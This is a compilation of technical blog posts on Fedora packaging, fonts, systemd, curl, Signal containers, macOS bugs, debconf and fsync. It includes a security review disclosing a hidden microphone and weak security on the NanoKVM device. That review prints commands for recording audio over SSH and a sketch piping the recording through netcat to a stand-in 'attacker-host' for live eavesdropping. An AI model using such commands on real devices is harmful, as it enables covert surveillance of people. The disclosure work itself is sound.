Note that both of these listings are going to include package versions that were never released as updates for various reasons, and also versions built for the pre-release Fedora 41. Although Koji has a 'f41-updates' tag, I haven't been able to find a way to restrict 'koji list-builds' output to packages with that tag, so we're getting more than we'd like even after we use a pattern to restrict this to just Fedora 41.

(I think you may need to use the source package name, not a binary package one; if so, you can get it with 'rpm -qi rust' or whatever and looking at the 'Source RPM' line and name.)

Once you've found the package version you want, the easiest and fastest way to get it is through the koji command line client, following the directions in Installing Kernel from Koji with appropriate changes:

mkdir /tmp/scr
cd /tmp/scr
koji download-build --arch=x86_64 --arch=noarch rust-1.83.0-1.fc41

This will get you a bunch of RPMs, and then you can do 'dnf downgrade /tmp/scr/*.rpm' to have dnf do the right thing (only downgrading things you actually have installed).

One reason you might want to use Koji is that this gets you a local copy of the old package in case you want to go back and forth between it and the latest version for testing. If you use the dnf updates-archive approach, you'll be re-downloading the old version at every cycle. Of course at that point you can also use Koji to get a local copy of the latest update too, or 'dnf download ...', although Koji has the advantage that it gets all the related packages regardless of their names (so for Rust you get the 'cargo', 'clippy', and 'rustfmt' packages too).

(In theory you can work through the Fedora Bodhi website, but in practice it seems to be extremely overloaded at the moment and very slow. I suspect that the bot scraper plague is one contributing factor.)

PS: If you're using updates-archive and you just want to download the old packages, I think what you want is 'dnf download --enablerepo=updates-archive ...'.

Fedora 41 seems to have dropped an old XFT font 'property'

By: cks

Today I upgraded my office desktop from Fedora 40 to Fedora 41, and as traditional there was a little issue:

Current status: it has been '0' days since a Fedora upgrade caused X font problems, this time because xft apparently no longer accepts 'encoding=...' as a font specification argument/option.

One of the small issues with XFT fonts is that they don't really have canonical names. As covered in the "Font Name" section of fonts.conf, a given XFT font is a composite of a family, a size, and a number of attributes that may be used to narrow down the selection of the XFT font until there's only one option left (or no option left). One way to write that in textual form is, for example, 'Sans:Condensed Bold:size=13'.

For a long time, one of the 'name=value' properties that XFT font matching accepted was 'encoding=<something>'. For example, you might say 'encoding=iso10646-1' to specify 'Unicode' (and back in the long ago days, this apparently could make a difference for font rendering). Although I can't find 'encoding=' documented in historical fonts.conf stuff, I appear to have used it for more than a decade, dating back to when I first converted my fvwm configuration from XLFD fonts to XFT fonts. It's still accepted today on Fedora 40 (although I suspect it does nothing):

: f40 ; fc-match 'Sans:Condensed Bold:size=13:encoding=iso10646-1'
DejaVuSans.ttf: "DejaVu Sans" "Regular"

However, it's no longer accepted on Fedora 41:

: f41 ; fc-match 'Sans:Condensed Bold:size=13:encoding=iso10646-1'
Unable to parse the pattern

Initially I thought this had to be a change in fontconfig, but that doesn't seem to be the case; both Fedora 40 and Fedora 41 use the same version, '2.15.0', just with different build numbers (partly because of a mass rebuild for Fedora 41). Freetype itself went from version 2.13.2 to 2.13.3, but the release notes don't seem to have anything relevant. So I'm at a loss. At least it was easy to fix once I knew what had happened; I just had to take the ':encoding=iso10646-1' bit out from the places I had it.

(The visual manifestation was that all of my fvwm menus and window title bars switched to a tiny font. For historical reasons all of my XFT font specifications in my fvwm configuration file used 'encoding=...', so in Fedora 41 none of them worked and fvwm reported 'can't load font <whatever>' and fell back to its default of an XLFD font, which was tiny on my HiDPI display.)

PS: I suspect that this change will be coming in other Linux distributions sooner or later. Unsurprisingly, Ubuntu 24.04's fc-match still accepts 'encoding=...'.

PPS: Based on ltrace output, FcNameParse() appears to be what fails on Fedora 41.

I should learn systemd's features for restricting things

By: cks

Today, for reasons beyond the scope of this entry, I took something I'd been running by hand from the command line for testing and tried to set it up under systemd. This is normally straightforward, and it should have been extra straightforward because the thing came with a .service file. But that .service file used a lot of systemd's features for restricting what programs can do, and for my sins I'd decided to set up the program with its binary, configuration file, and so on in different places than it expected (and I think without some things it expected, like a supplementary group for permission to read some files). This was, unfortunately, an abject failure, so I wound up yanking all of the restrictions except 'DynamicUser=true'.

I'm confident that with enough time, I can (or could) sort out all of the problems (although I didn't feel like spending that time today). What this experience really points out is that systemd has a lot of options for really restricting what programs you run can do, and I'm not particularly familiar with them. To get the service working with all of its original restrictions, I'd have to read my way through things like systemd.exec and understand everything the .service file used. Once I did that, I could have understood what I needed to change to deal with my setup of the program.

(An expert probably could have fixed things in short order.)

That systemd has a lot of potential restrictions it can impose and that those restrictions are complex is not a flaw of systemd (or its fault). We already know that fine grained permissions are hard to set up and manage in any environment, especially if you don't know what you're doing (as I don't with systemd's restrictions). At the same time, fine grained restrictions are quite useful for being able to apply some restrictions to programs not designed for them.
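To give a flavour of what's involved, here is a hypothetical .service fragment using a handful of real systemd.exec directives (the program, paths, and group are all made up):

[Service]
ExecStart=/opt/thing/bin/thingd --config /etc/thing/thingd.conf
DynamicUser=true
# the supplementary group that lets it read some shared files
SupplementaryGroups=thingdata
# a small sample of the many available restrictions
NoNewPrivileges=true
ProtectSystem=strict
ProtectHome=true
PrivateTmp=true
# ProtectSystem=strict makes the filesystem read-only, so carve out state
ReadWritePaths=/var/lib/thing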

(The simplicity of OpenBSD's 'pledge' system is great, but it needs the program's active cooperation. For better or worse, Linux doesn't have a native, fully supported equivalent; instead we have to build it out of more fine grained, lower level facilities, and that's what systemd exposes.)

Learning how to use the restrictions is probably worthwhile in general. We run plenty of things through locally written systemd .service units. Some of those things are potentially risky (although generally not too risky), and some of them could be more restricted than they are today if we wanted to do the work and knew what we were doing (and knew some of the gotchas involved).

(And sooner or later we're going to run into more things with restrictions already in their .service units, and we're going to want to change some aspects of how they work.)

I'm working to switch from wget to curl (due to Fedora)

By: cks

I've been using wget for a long time now, which means that I've developed a lot of habits, reflexes and even little scripts around it. Then wget2 happened, or more exactly Fedora switched from wget to wget2 (and Ubuntu is probably going to follow along). I'm very much not a fan of wget2 (also); I find it has both worse behavior and worse output than classical wget, in ways that routinely get in my way. Or got in my way before I started retraining myself to use curl instead of wget.

(It's actually possible that Ubuntu won't follow Fedora here. Ubuntu 24.04's 'wget' is classic wget, and Debian unstable currently has the wget package still as classic wget. The wget to wget2 transition involves the kind of changes that I can see Debian developers rejecting, so maybe Debian will keep 'wget' as classic wget. The upstream has a wget 1.25.0 release as recently as November 2024 (cf); on the other hand, the main project page says that 'currently GNU wget2 is being developed', so it certainly sounds like the upstream wants to move.)

One tool for my switch is wcurl (also, via), which is a cover script to provide a wget-like interface to curl. But I don't have wcurl everywhere (it's not packaged in Ubuntu 24.04, although I think it's coming in 26.04), so I've also been working to remember things like curl's -L and -O options (for downloading things, these are basically 'do what I want' options; I almost always want curl to follow HTTP redirects). There's a number of other options I want to remember, so since I've been looking at the curl manual page, here's some notes to myself.

(If I downloaded multiple URLs at once, I'll probably want to use '--remote-name-all' instead of repeating -O a lot. But I'm probably not going to remember that unless I write a script.)

My 'wcat' script is basically 'curl -L -sS <url>' (-s to not show the progress bar, -S to still print error messages despite -s, -L to follow redirects). My related 'wretr' script, which is intended to show headers too, is 'curl -L -sS -i <url>' (-i includes headers), or 'curl -sS -i <url>' if I want to explicitly see any HTTP redirect rather than automatically follow it.

(What I'd like is an option to show HTTP headers only if there was an HTTP error, but curl is currently all or nothing here.)

Some of the time I'll want to fetch files with the -J option, which is the curl equivalent of wget's --trust-server-names. This is necessary in cases where a project doesn't bother with good URLs for things. Possibly I also want to use '-R' to set the local downloaded file's timestamp based on the server provided timestamp, which is wget's traditional behavior (sometimes it's good, sometimes it's confusing).

PS: I care about wcurl being part of a standard Ubuntu package because then we can install it as part of one of our standard package sets. If it's a personal script, it's not pervasive, although that's still better than nothing.

PPS: I'm not going to blame Fedora for the switch from wget to wget2. Fedora has a consistent policy of marching forward in changes like this to stay in sync with what upstream is developing, even when they cause pain to people using Fedora. That's just what you sign up for when you choose Fedora (or drift into it, in my case; I've been using 'Fedora' since before it was Fedora).

How I discovered a hidden microphone on a Chinese NanoKVM

NanoKVM is a hardware KVM switch developed by the Chinese company Sipeed. Released last year, it enables remote control of a computer or server using a virtual keyboard, mouse, and monitor. Thanks to its compact size and low price, it quickly gained attention online, especially when the company promised to release its code as open-source. However, as we’ll see, the device has some serious security issues. But first, let’s start with the basics.

How Does the Device Work?

As mentioned, NanoKVM is a KVM switch designed for remotely controlling and managing computers or servers. It features an HDMI port, three USB-C ports, an Ethernet port for network connectivity, and a special serial interface. The package also includes a small accessory for managing the power of an external computer.

Using it is quite simple. First, you connect the device to the internet via an Ethernet cable. Once online, you can access it through a standard web browser (though JavaScript JIT must be enabled). The device supports Tailscale VPN, but with some effort (read: hacking), it can also be configured to work with your own VPN, such as a WireGuard or OpenVPN server. Once set up, you can control it from anywhere in the world via your browser.

NanoKVM

The device connects to the target computer using an HDMI cable, capturing the video output that would normally be displayed on a monitor. This allows you to view the computer’s screen directly in your browser, with the NanoKVM essentially acting as a virtual monitor.

Through the USB connection, NanoKVM can also emulate a keyboard, mouse, CD-ROM, USB drive, and even a USB network adapter. This means you can remotely control the computer as if you were physically sitting in front of it - but all through a web interface.

While it functions similarly to remote management tools like RDP or VNC, it has one key difference: there’s no need to install any software on the target computer. Simply plug in the device, and you’re ready to manage it remotely. NanoKVM even allows you to enter the BIOS, and with the additional accessory for power management, you can remotely turn the computer on, off, or reset it.

This makes it incredibly useful - you can power on a machine, access the BIOS, change settings, mount a virtual bootable CD, and install an operating system from scratch, just as if you were physically there. Even if the computer is on the other side of the world.

NanoKVM is also quite affordable. The fully-featured version, which includes all ports, a built-in mini screen, and a case, costs just over €60, while the stripped-down version is around €30. By comparison, a similar Raspberry Pi-based device, PiKVM, costs around €400. However, PiKVM is significantly more powerful and reliable and, with a KVM splitter, can manage multiple devices simultaneously.

As mentioned earlier, the announcement of the device caused quite a stir online - not just because of its low price, but also due to its compact size and minimal power consumption. In fact, it can be powered directly from the target computer over a single USB cable: in one direction the cable powers the NanoKVM, while in the other it carries the keyboard, mouse, and other USB devices that the NanoKVM emulates for the computer you want to manage.

The device is built on the open-source RISC-V processor architecture, and the manufacturer eventually did release the device’s software under an open-source license at the end of last year. (To be fair, one part of the code remains closed, but the community has already found a suitable open-source replacement, and the manufacturer has promised to open this portion soon.)

However, the real issue is security.

Understandably, the company was eager to release the device as soon as possible. In fact, an early version had a minor hardware design flaw - due to an incorrect circuit cable, the device sometimes failed to detect incoming HDMI signals. As a result, the company recalled and replaced all affected units free of charge. Software development also progressed rapidly, but in such cases, the primary focus is typically on getting basic functionality working, with security taking a backseat.

So, it’s not surprising that the developers made some serious missteps - rushed development often leads to stupid mistakes. But some of the security flaws I discovered in my quick (and by no means exhaustive) review are genuinely concerning.

One of the first security analyses revealed numerous vulnerabilities - and some rather bizarre discoveries. For instance, a security researcher even found an image of a cat embedded in the firmware. While the Sipeed developers acknowledged these issues and fixed at least some of them relatively quickly, many remain unresolved.

NanoKVM

After purchasing the device myself, I ran a quick security audit and found several alarming flaws. The device initially came with a default password, and SSH access was enabled using this preset password. I reported this to the manufacturer, and to their credit, they fixed it relatively quickly. However, many other issues persist.

The user interface is riddled with security flaws - there’s no CSRF protection, no way to invalidate sessions, and more. Worse yet, the encryption key used for password protection (when logging in via a browser) is hardcoded and identical across all devices. This is a major security oversight, as it allows an attacker to easily decrypt passwords. More problematic still, all of this had to be explained to the developers. Multiple times.

Another concern is the device’s reliance on Chinese DNS servers, and configuring your own (custom) DNS settings is quite complicated. Additionally, the device communicates with Sipeed’s servers in China - downloading not only updates but also the closed-source component mentioned earlier. To fetch this component, the device has to verify an identification key, which is stored on it in plain text. Alarmingly, the device does not verify the integrity of software updates, includes a strange version of the WireGuard VPN application (which does not work on some networks), and runs a heavily stripped-down version of Linux that lacks systemd and apt. And these are just a few of the issues.

Were these problems simply oversights? Possibly. But what raised additional red flags was the presence of tcpdump and aircrack - tools commonly used for network packet analysis and wireless security testing. While these are useful for debugging and development, they are also hacking tools that can be dangerously exploited. I can understand why developers might use them during testing, but they have absolutely no place on a production version of the device.

A Hidden Microphone

And then I discovered something even more alarming - a tiny built-in microphone that isn’t clearly mentioned in the official documentation. It’s a miniature SMD component, measuring just 2 x 1 mm, yet capable of recording surprisingly high-quality audio.

What’s even more concerning is that all the necessary recording tools are already installed on the device! By simply connecting via SSH (remember, the device initially used default passwords!), I was able to start recording audio using the amixer and arecord tools. Once recorded, the audio file could be easily copied to another computer. With a little extra effort, it would even be possible to stream the audio over a network, allowing an attacker to eavesdrop in real time.
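For illustration, here is a rough sketch of what such real-time streaming could look like, assuming netcat is available on the device (or can be copied over) and with attacker-host standing in for the listener's machine; exact nc flags vary between netcat variants:

# on the NanoKVM: capture raw audio and push it over the network
arecord -Dhw:0,0 -r 48000 -f S16_LE -t raw | nc attacker-host 9000

# on the listener's machine: receive the stream and play it
nc -l -p 9000 | aplay -r 48000 -f S16_LE -t raw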

Hidden Microphone in NanoKVM

Physically removing the microphone is possible, but it’s not exactly straightforward. As seen in the image, disassembling the device is tricky, and due to the microphone’s tiny size, you’d need a microscope or magnifying glass to properly desolder it.

To summarize: the device is riddled with security flaws, originally shipped with default passwords, communicates with servers in China, comes preinstalled with hacking tools, and even includes a built-in microphone - fully equipped for recording audio - without clear mention of it in the documentation. Could it get any worse?

I am pretty sure these issues stem from extreme negligence and rushed development rather than malicious intent. However, that doesn’t make them any less concerning.

That said, these findings don’t mean the device is entirely unusable.

Since the device is open-source, it’s entirely possible to install custom software on it. In fact, one user has already begun porting his own Linux distribution - starting with Debian and later switching to Ubuntu. With a bit of luck, this work could soon lead to official Ubuntu Linux support for the device.

This custom Linux version already runs the manufacturer’s modified KVM code, and within a few months, we’ll likely have a fully independent and significantly more secure software alternative. The only minor inconvenience is that installing it requires physically opening the device, removing the built-in SD card, and flashing the new software onto it. However, in reality, this process isn’t too complicated.
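For the curious, the reflashing step itself is the usual SD card procedure; a minimal sketch, with custom-linux.img and /dev/sdX as placeholders for the image file and the card's device node:

# back up the original card first
sudo dd if=/dev/sdX of=nanokvm-backup.img bs=4M status=progress
# write the alternative image to the card
sudo dd if=custom-linux.img of=/dev/sdX bs=4M status=progress conv=fsync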

And while you’re at it, you might also want to remove the microphone… or, if you prefer, connect a speaker. In my test, I used an 8-ohm, 0.5 W speaker, which produced surprisingly good sound - essentially turning the NanoKVM into a tiny music player. The idea is actually not so bad, since PiKVM also added two-way audio support to their devices at the end of last year.

Basic board with speaker

Final Thoughts

All this of course raises an interesting question: How many similar devices with hidden functionalities might be lurking in your home, just waiting to be discovered? And not just those of Chinese origin. Are you absolutely sure none of them have built-in miniature microphones or cameras?

You can start with your iPhone - last year Apple agreed to pay $95 million to settle a lawsuit alleging that its voice assistant Siri recorded private conversations, which were then shared with third parties and used for targeted ads. “Unintentionally”, of course! Yes, that Apple, the one that cares so much about your privacy.

And Google is doing the same. They are facing a similar lawsuit over their voice assistant, but the litigation likely won’t be settled until this fall. So no, small Chinese startup companies are not the only problem. And if you are worried about Chinese companies’ obligations towards the Chinese government, let’s not forget that U.S. companies also have obligations to cooperate with the U.S. government. While Apple publicly claims it does not cooperate with the FBI and other U.S. agencies (because they care about your privacy so much), some media revealed that Apple has been holding a series of secretive Global Police Summits at its Cupertino headquarters, where it taught police how to use its products for surveillance and policing work. And as one of the police officers pointed out, he has “never been part of an engagement that was so collaborative.” Yep.

P.S. How to Record Audio on NanoKVM

If you want to test the built-in microphone yourself, simply connect to the device via SSH and run the following two commands:

  • amixer -Dhw:0 cset name='ADC Capture Volume' 20 (this sets the microphone sensitivity to high)
  • arecord -Dhw:0,0 -d 3 -r 48000 -f S16_LE -t wav test.wav > /dev/null & (this captures three seconds of audio to a file named test.wav)

Now, speak or sing (perhaps the Chinese national anthem?) near the device; once the three-second recording finishes, copy the test.wav file to your computer and listen to it.


A Signal container

Signal is an application for secure and private messaging that is free, open source, and easy to use. It uses strong end-to-end encryption, and it is used by numerous activists, journalists, and whistleblowers, as well as government officials and business people - in short, by everyone who values their privacy. Signal runs on Android and iOS mobile phones as well as on desktop computers (Linux, Windows, MacOS), where the desktop version is designed to be linked with the mobile copy of Signal. This lets us use all of Signal's features both on the phone and on the desktop, and all messages, contacts, and so on are synchronized between the two devices. All well and good, but Signal is (unfortunately) tied to a phone number, and as a rule you can run only one copy of Signal on a single phone; the same goes for a desktop computer. Can this limitation be worked around? Certainly, but it takes a small “hack”. Read on to find out how.

Running multiple copies of Signal on a phone

Running multiple copies of Signal on a phone is very easy - but only if you use GrapheneOS. GrapheneOS is a mobile operating system with numerous built-in security mechanisms, designed to protect the user's privacy as much as possible. It is open source and highly compatible with Android, but with many improvements that make both forensic data seizure and attacks with spyware of the Pegasus and Predator variety extremely difficult or outright impossible.

GrapheneOS supports multiple profiles (up to 31, plus a so-called guest profile), which are completely isolated from one another. This means you can install different applications in different profiles, keep entirely separate contact lists, use one VPN in one profile and a different one (or none at all) in another, and so on.

The solution is therefore simple. On a phone running GrapheneOS, we create a new profile, install a new copy of Signal there, insert a second SIM card into the phone, and register Signal with the new number.

Once the phone number is registered, we can remove the SIM card and put the old one back in. Signal only uses data transfer for its communication (and the phone can of course also be used without a SIM card, on WiFi alone). We now have two copies of Signal installed on the phone, tied to two different phone numbers, and we can send messages (even between the two of them!) or make calls from both.

Although the profiles are isolated, we can arrange for notifications from the Signal app in the second profile to arrive even while we are logged into the first profile. Only for writing messages or making calls do we need to switch to the right profile on the phone.

Simple, right?

Running multiple copies of Signal on a computer

Naturally, we would now like something similar on a computer as well. In short, we want to be able to run two different instances of Signal (each tied to its own phone number) on one computer, under a single user.

At first glance this looks slightly more complicated, but with the help of virtualization the problem can be solved elegantly. Of course we are not going to run a whole new virtual machine just for Signal; we can use a so-called container instead.

On Linux, we first install the systemd-container package (on Ubuntu systems it is already installed by default).
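If it is missing, installing it is a single command (assuming a Debian-family distribution):

sudo apt install systemd-container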

On the host machine, we enable so-called unprivileged user namespaces: run sudo nano /etc/sysctl.d/nspawn.conf and put the following into the file:

kernel.unprivileged_userns_clone=1

Now the relevant systemd service needs to be restarted:

sudo systemctl daemon-reload
sudo systemctl restart systemd-sysctl.service
sudo systemctl status systemd-sysctl.service

…and then we can install Debootstrap: sudo apt install debootstrap.

Now we create a new container into which we will install the Debian operating system (the stable release) - in reality, only the minimally required parts of the operating system will be installed:

sudo debootstrap --include=systemd,dbus stable /var/lib/machines/debian

We get output roughly like this:

I: Keyring file not available at /usr/share/keyrings/debian-archive-keyring.gpg; switching to https mirror https://deb.debian.org/debian
I: Retrieving InRelease 
I: Retrieving Packages 
I: Validating Packages 
I: Resolving dependencies of required packages...
I: Resolving dependencies of base packages...
I: Checking component main on https://deb.debian.org/debian...
I: Retrieving adduser 3.134
I: Validating adduser 3.134
...
...
...
I: Configuring tasksel-data...
I: Configuring libc-bin...
I: Configuring ca-certificates...
I: Base system installed successfully.

The container with the Debian operating system is now installed, so we start it and set the root user's password:

sudo systemd-nspawn -D /var/lib/machines/debian -U --machine debian

We get the output:

Spawning container debian on /var/lib/machines/debian.
Press Ctrl-] three times within 1s to kill container.
Selected user namespace base 1766326272 and range 65536.
root@debian:~#

Now, connected to the operating system through this virtual terminal, we enter the following two commands:

passwd
printf 'pts/0\npts/1\n' >> /etc/securetty 

The first command sets the password, and the second allows logins via a so-called local terminal (TTY). Finally, we type the logout command to log out and return to the host machine.

Next, we need to set up the network the container will use. The simplest option is to just use the host machine's network. We enter the following two commands:

sudo mkdir /etc/systemd/nspawn
sudo nano /etc/systemd/nspawn/debian.nspawn

Into the file we enter:

[Network]
VirtualEthernet=no

Now we start the container again with sudo systemctl start systemd-nspawn@debian, or even more simply with machinectl start debian.
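If we also want the container to come up automatically at boot, machinectl can enable it:

sudo machinectl enable debian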

We can also list the running containers:

machinectl list
MACHINE CLASS     SERVICE        OS     VERSION ADDRESSES
debian  container systemd-nspawn debian 12      -        

1 machines listed.

Then we can log into this virtual container with machinectl login debian. We get the output:

Connected to machine debian. Press ^] three times within 1s to exit session.

Debian GNU/Linux 12 cryptopia pts/1

cryptopia login: root
Password: 

The output shows that we logged in as the root user, with the password we set earlier.

Now we install Signal Desktop in this container:

apt update
apt install wget gpg

wget -O- https://updates.signal.org/desktop/apt/keys.asc | gpg --dearmor > /usr/share/keyrings/signal-desktop-keyring.gpg

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/desktop/apt xenial main' | tee /etc/apt/sources.list.d/signal-xenial.list

apt update
apt install --no-install-recommends signal-desktop
halt

The last command shuts the container down. It now has a fresh copy of the Signal Desktop application installed.

Incidentally, we can rename the container to a friendlier name if we like, e.g. sudo machinectl rename debian debian-signal. Of course, we will then have to use that name when starting and logging into the container (that is, machinectl login debian-signal).

Next, we create a script that starts the container and launches Signal Desktop inside it in such a way that its window appears on the host machine's desktop.

We create the file /opt/runContainerSignal.sh (with nano /opt/runContainerSignal.sh; we store it in the /opt directory, for example), with the following contents:

#!/bin/sh
xhost +local:
pkexec systemd-nspawn --setenv=DISPLAY=:0 \
                      --bind-ro=/tmp/.X11-unix/  \
                      --private-users=pick \
                      --private-users-chown \
                      -D /var/lib/machines/debian-signal/ \
                      --as-pid2 signal-desktop --no-sandbox
xhost -local:

The first xhost command allows connections to our display, but only from the local machine; the second xhost command blocks those connections (to the display) again. We make the script executable (chmod +x runContainerSignal.sh), and that's it.

Two Signal Desktop icons

Well, not quite: we would still have to launch the script from a terminal, and starting it with a click on an icon is much more convenient.

So we create a .desktop file with nano ~/.local/share/applications/runContainerSignal.desktop and write the following contents into it:

[Desktop Entry]
Type=Application
Name=Signal Container
Exec=/opt/runContainerSignal.sh
Icon=security-high
Terminal=false
Comment=Run Signal Container

…instead of the security-high icon, we can use a different one, for example:

Icon=/usr/share/icons/Yaru/scalable/status/security-high-symbolic.svg

A note: the .desktop file is stored in ~/.local/share/applications/, so it is available only to this specific user and not to all users on the computer.

Now we make the .desktop file executable: chmod +x ~/.local/share/applications/runContainerSignal.desktop

Finally, we refresh the so-called desktop entries with update-desktop-database ~/.local/share/applications/, and that's it!

Two instances of Signal Desktop

When we type “Signal Container” into the application launcher, the application's icon appears; clicking it launches Signal in the container (we will need to enter a password at startup).

Now we just link this Signal Desktop with the copy of Signal on the phone, and we can use two copies of the Signal Desktop application on the computer.

What about…?

Unfortunately, camera and audio access do not work in the setup described. Calls will therefore still have to be made from the phone.

It turns out that connecting the container to the host machine's PipeWire sound system and camera is remarkably complicated (at least in my system setup). If you have a hint on how to solve this, do let me know. :)
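One direction that might be worth exploring - untested here, and both the uid (1000) and the socket path are assumptions - is bind-mounting the host's PipeWire socket into the container when it is started, roughly like this:

# hypothetical sketch: expose the host's PipeWire socket to the container
pkexec systemd-nspawn --bind=/run/user/1000/pipewire-0 \
                      --setenv=PIPEWIRE_RUNTIME_DIR=/run/user/1000 \
                      --setenv=DISPLAY=:0 \
                      --bind-ro=/tmp/.X11-unix/ \
                      -D /var/lib/machines/debian-signal/ \
                      --as-pid2 signal-desktop --no-sandbox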

The Myth and Reality of Mac OS X Snow Leopard

By: Nick Heer

Jeff Johnson in November 2023:

When people wistfully proclaim that they wish for the next major macOS version to be a “Snow Leopard update”, they’re wishing for the wrong thing. No major update will solve Apple’s quality issues. Major updates are the cause of quality issues. The solution would be a long string of minor bug fix updates. What people should be wishing for are the two years of stability and bug fixes that occurred after the release of Snow Leopard. But I fear we’ll never see that again with Tim Cook in charge.

I read an article today from yet another person pining for a mythical Snow Leopard-style MacOS release. While I sympathize with the intent of their argument, it is largely fictional and, as Johnson writes, it took until about two years into Snow Leopard’s release cycle for it to be the release we want to remember:

It’s an iron law of software development that major updates always introduce more bugs than they fix. Mac OS X 10.6.0 was no exception, of course. The next major update, Mac OS X 10.7.0, was no exception either, and it was much buggier than 10.6.8 v1.1, even though both versions were released in the same week.

What I desperately miss is that period of stability after a few rounds of bug fixes. As I have previously complained about, my iMac cannot run any version of MacOS newer than Ventura, released in 2022. It is still getting bug and security fixes. In theory, this should mean I am running a solid operating system despite missing some features.

It is not. Apple’s engineering efforts quickly moved toward shipping MacOS Sonoma in 2023, and then Sequoia last year. It seems as though any bug fixes were folded into these new major versions and, even worse, new bugs were introduced late in the Ventura release cycle that have no hope of being fixed. My iMac seizes up when I try to view HDR media; because this Extended Dynamic Range is an undocumented enhancement, there is no preference to turn it off. Recent Safari releases have contained several bugs related to page rendering and scrolling. Weather sometimes does not display for my current location.

Ventura was by no means bug-free when it shipped, and I am disappointed even its final form remains a mess. My MacBook Pro is running the latest public release of MacOS Sequoia and it, too, has new problems late in its development cycle; I reported a Safari page crashing bug earlier this week. These are on top of existing problems, like how there is no way to change the size of search results’ thumbnails in Photos.

Alas, I am not expecting many bugs to be fixed. It is, after all, nearly April, which means there are just two months until WWDC and the first semi-public builds of another new MacOS version. I am hesitant every year to upgrade. But it does not appear much effort is being put into the maintenance of any previous version. We all get the choice of many familiar bugs, or a blend of hopefully fewer old bugs plus some new ones.

⌥ Permalink

‘Adolescence’

By: Nick Heer

Lucy Mangan, the Guardian:

There have been a few contenders for the crown [of “televisual perfection”] over the years, but none has come as close as Jack Thorne’s and Stephen Graham’s astonishing four-part series Adolescence, whose technical accomplishments – each episode is done in a single take – are matched by an array of award-worthy performances and a script that manages to be intensely naturalistic and hugely evocative at the same time. Adolescence is a deeply moving, deeply harrowing experience.

I did not intend on watching the whole four-part series today, maybe just the first and second episodes. But I could not turn away. The effectively unanimous praise for this is absolutely earned.

The oner format sounds like it could be a gimmick, the kind of thing that screams a bit too loud and overshadows what should be a tender and difficult narrative. Nothing could be further from the truth. The technical decisions force specific storytelling decisions, in the same way that a more maximalist production in the style of, say, David Fincher does. Fincher would shoot fifty versions of everything and then assemble the best performances into a tight machine — and I love that stuff. But I love this, too, little errors and all. It is better for these choices. The dialogue cannot get just a little bit tighter in the edit, or whatever. It is all just there.

I know nothing about reviewing television or movies but, so far as I can tell, everyone involved has pulled this off spectacularly. You can quibble with things like the rainbow party-like explanation of different emoji — something for which I cannot find any evidence — that has now become its own moral panic. I get that. Even so, this is one of the greatest storytelling achievements I have seen in years.

Update: Watch it on Netflix. See? The ability to edit means I can get away with not fully thinking this post through.

⌥ Permalink

How we handle debconf questions during our Ubuntu installs

By: cks

In a comment on How we automate installing extra packages during Ubuntu installs, David Magda asked how we dealt with the things that need debconf answers. This is a good question and we have two approaches that we use in combination. First, we have a prepared file of debconf selections for each Ubuntu version and we feed this into debconf-set-selections before we start installing packages. However in practice this file doesn't have much in it and we rarely remember to update it (and as a result, a bunch of it is somewhat obsolete). We generally only update this file if we discover debconf selections where the default doesn't work in our environment.
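For illustration, a debconf selections file is just lines of '<package> <question> <type> <value>'; the line below is a common example of the format (not necessarily one from our file), and the file name here is made up:

# format: <package> <question> <type> <value>
postfix postfix/main_mailer_type select No configuration

debconf-set-selections < our-selections.txt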

Second, we run apt-get with a bunch of environment variables set to muzzle debconf:

export DEBCONF_TERSE=yes
export DEBCONF_NOWARNINGS=yes
export DEBCONF_ADMIN_EMAIL=<null address>@<our domain>
export DEBIAN_FRONTEND=noninteractive

Traditionally I've considered muzzling debconf this way to be too dangerous to do during package updates or installing packages by hand. However, I consider it not so much safe as safe enough to do this during our standard install process. To put it one way, we're not starting out with a working system and potentially breaking it by letting some new or updated package pick bad defaults. Instead we're starting with a non-working system and hopefully ending up with a working one. If some package picks bad defaults and we wind up with problems, that's not much worse than we started out with and we'll fix it by updating our file of debconf selections and then redoing the install.

Also, in practice all of this gets worked out during our initial test installs of any new Ubuntu version (done on test virtual machines these days). By the time we're ready to start installing real servers with a new Ubuntu version, we've gone through most of the discovery process for debconf questions. Then the only time we're going to have problems during future system installs is if a package update either changes the default answer for a current question (to a bad one) or adds a new question with a bad default. As far as I can remember, we haven't had either happen.

(Some of our servers need additional packages installed, which we do by hand (as mentioned), and sometimes the packages will insist on stopping to ask us questions or give us warnings. This is annoying, but so far not annoying enough to fix it by augmenting our standard debconf selections to deal with it.)

The pragmatics of doing fsync() after a re-open() of journals and logs

By: cks

Recently I read Rob Norris' fsync() after open() is an elaborate no-op (via). This is a contrarian reaction to the CouchDB article that prompted my entry Always sync your log or journal files when you open them. At one level I can't disagree with Norris and the article; POSIX is indeed very limited about the guarantees it provides for a successful fsync() in a way that frustrates the 'fsync after open' case.

At another level, I disagree with the article. As Norris notes, there are systems that go beyond the minimum POSIX guarantees, and also the fsync() after open() approach is almost the best you can do and is much faster than your other (portable) option, which is to call sync() (on Linux you could call syncfs() instead). Under POSIX, sync() is allowed to return before the IO is complete, but at least sync() is supposed to definitely trigger flushing any unwritten data to disk, which is more than POSIX fsync() provides you (as Norris notes, POSIX permits fsync() to apply only to data written to that file descriptor, not all unwritten data for the underlying file). As far as fsync() goes, in practice I believe that almost all Unixes and Unix filesystems are going to be more generous than POSIX requires and fsync() all dirty data for a file, not just data written through your file descriptor.
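As a concrete illustration of the pattern being argued about, here is a minimal sketch in C of the 'fsync() after open()' approach for appending to a log (names and error handling are simplified):

#include <fcntl.h>
#include <unistd.h>

int append_record(const char *path, const char *buf, size_t len) {
    int fd = open(path, O_WRONLY | O_APPEND);
    if (fd < 0)
        return -1;
    /* flush anything earlier writers left unsynced; on most real
       systems fsync() is more generous than the POSIX minimum */
    if (fsync(fd) != 0 ||
        write(fd, buf, len) != (ssize_t)len ||
        fsync(fd) != 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}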

Actually being as restrictive as POSIX allows would likely be a problem for Unix kernels. The kernel wants to index the filesystem cache by inode, including unwritten data. This makes it natural for fsync() to flush all unwritten data associated with the file regardless of who wrote it, because then the kernel needs no extra data to be attached to dirty buffers. If you wanted to be able to flush only dirty data associated with a file object or file descriptor, you'd need to either add metadata associated with dirty buffers or index the filesystem cache differently (which is clearly less natural and probably less efficient).

